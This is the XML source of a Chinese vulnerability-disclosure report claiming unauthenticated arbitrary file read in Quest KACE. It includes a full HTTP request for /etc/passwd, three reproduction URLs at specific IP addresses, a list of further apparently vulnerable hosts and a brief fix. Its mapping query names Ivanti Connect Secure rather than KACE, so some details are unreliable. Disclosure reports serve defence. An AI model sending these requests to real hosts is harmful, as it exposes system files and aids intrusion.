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859FF">
      <w:pPr>
        <w:ind w:left="1968" w:hanging="1968" w:hangingChars="700"/>
        <w:outlineLvl w:val="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漏洞报告标题:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C27BAC">
      <w:pPr>
        <w:ind w:left="1965" w:leftChars="269" w:hanging="1400" w:hangingChars="500"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="AFABAB" w:themeColor="background2" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Quest Software</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>公司KACE系统管理平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存在任意文件读取漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628802C">
      <w:pPr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</w:p>
    <w:p w14:paraId="5B07BB57">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞发现时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77546203">
      <w:pPr>
        <w:ind w:firstLine="562" w:firstLineChars="200"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2026/2/13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC18014">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24794AE8">
      <w:pPr>
        <w:outlineLvl w:val="0"/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漏洞技术类型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55852153">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:color w:val="auto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  <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>任意文件读取漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD320B3">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/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</w:p>
    <w:p w14:paraId="129EFB3F">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/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</w:p>
    <w:p w14:paraId="1FA3E54E">
      <w:pPr>
        <w:outlineLvl w:val="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 xml:space="preserve">漏洞描述: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBB1A1B">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:color w:val="FF0000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  <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Quest Software公司KACE系统管理平台存在任意文件读取漏洞，该漏洞可以非法获取敏感信息，造成数据泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B88F4">
      <w:pPr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</w:p>
    <w:p w14:paraId="62B3D665">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞危害</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0DB13D">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/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  <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Quest Software公司KACE系统管理平台存在任意文件读取漏洞，该漏洞可以非法获取敏感信息，造成数据泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F0B79D">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312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</w:p>
    <w:p w14:paraId="2F88DFFC">
      <w:pPr>
        <w:outlineLvl w:val="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漏洞厂商全称:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D9ABB5">
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/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Quest Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F07A398">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53772046">
      <w:pPr>
        <w:outlineLvl w:val="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已知受影响产品及版本:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509E9B2">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>KACE系统管理平台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D891B7">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/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</w:p>
    <w:p w14:paraId="5E842B6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406DE899">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"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互联网资产证明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A0BCB">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1）精准测绘语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13510A2D">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>title="Ivanti Connect Secure"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B6E085">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>互联网影响资产数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2645781</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32557520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8ABEFA">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3）测绘平台截图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E47D8BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3489325"/>
            <wp:effectExtent l="0" t="0" r="10160" b="158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411DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05131C47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424E1122">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442D2681">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15537EFE">
      <w:pPr>
        <w:outlineLvl w:val="0"/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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、漏洞技术细节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32953110">
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1）完整P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>oC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED99EE7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GET /etc/passwd HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540D5EF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Host: 16.26.54.32:2058</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431DE56F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Cookie:kboxid=xtp2g9lz5we9ucsejla1cv4bovscz892; csrftoken=MIrTbkI3wReAgRNkwbsBbQt5qLMoXsZfVocOlo7PBV22o0RcIvzRP70Kr9OuLbCo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CBFE80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Cache-Control: max-age=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F677C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Sec-Ch-Ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E2124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Sec-Ch-Ua-Mobile: ?0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779A5038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Sec-Ch-Ua-Platform: "Windows"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E0B46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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03AB2E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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68441506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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E76605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Sec-Fetch-Site: none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271BB2BE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Sec-Fetch-Mode: navigate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B41AF74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Sec-Fetch-User: ?1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33716272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Sec-Fetch-Dest: document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BE2AC3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Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B188090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Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3481A02A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Priority: u=0, i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0932FE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hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB194A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BACEE4">
      <w:pPr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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2）触发条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A6EBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">      无需登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64234C0C">
      <w:pPr>
        <w:outlineLvl w:val="0"/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2、复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>证明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FFF98B">
      <w:pPr>
        <w:ind w:firstLine="562" w:firstLineChars="20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黑盒案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F1E3F4">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1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  <w:t>复现1、https://16.26.54.32:2058/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05836BF8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="7323455"/>
            <wp:effectExtent l="0" t="0" r="825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2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FA09F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9FEAD8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348BEF11">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1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b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
      <w:r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  <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r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  <w:t>http://16.28.4.198:40000/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD1B02B">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="7418705"/>
            <wp:effectExtent l="0" t="0" r="2540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ABF7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1622A40B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AF5A03">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B9A701">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r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  <w:t>https://16.26.48.195:8865/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273EBCC4">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="9"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="7482840"/>
            <wp:effectExtent l="0" t="0" r="4445" b="381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69F9">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="576" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>其他漏洞URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405AC0B3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Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C605CC2">
      <w:pPr>
        <w:pStyle w:val="11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15.161.185.21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DBED0A">
      <w:pPr>
        <w:pStyle w:val="11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13.212.253.40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131FC142">
      <w:pPr>
        <w:pStyle w:val="11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99.79.45.70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3027250E">
      <w:pPr>
        <w:pStyle w:val="11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13.60.48.71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784DF43B">
      <w:pPr>
        <w:pStyle w:val="11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43.198.210.91</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA90AA">
      <w:pPr>
        <w:pStyle w:val="11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13.238.219.222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4926CDDC">
      <w:pPr>
        <w:pStyle w:val="11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16.26.54.32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB6AE34">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="D7D7D7" w:themeFill="background1" w:themeFillShade="D8"/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13.211.80.169</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E545F38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507A15A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:outlineLvl w:val="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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>修复方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48512BC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体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 w:val="0"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>增加访问</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>验证机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239059B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="仿宋_GB2312" w:eastAsia="仿宋_GB2312"/>
          <w:color w:val="AFABAB" w:themeColor="background2" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr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ans">
    <w:altName w:val="Malgun Gothic Semilight"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000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764F56"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="32764F56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2D2"/>
    <w:rsid w:val="00010652"/>
    <w:rsid w:val="000C2F72"/>
    <w:rsid w:val="000C3027"/>
    <w:rsid w:val="000C6508"/>
    <w:rsid w:val="001049B0"/>
    <w:rsid w:val="0014248E"/>
    <w:rsid w:val="001753A0"/>
    <w:rsid w:val="001912BA"/>
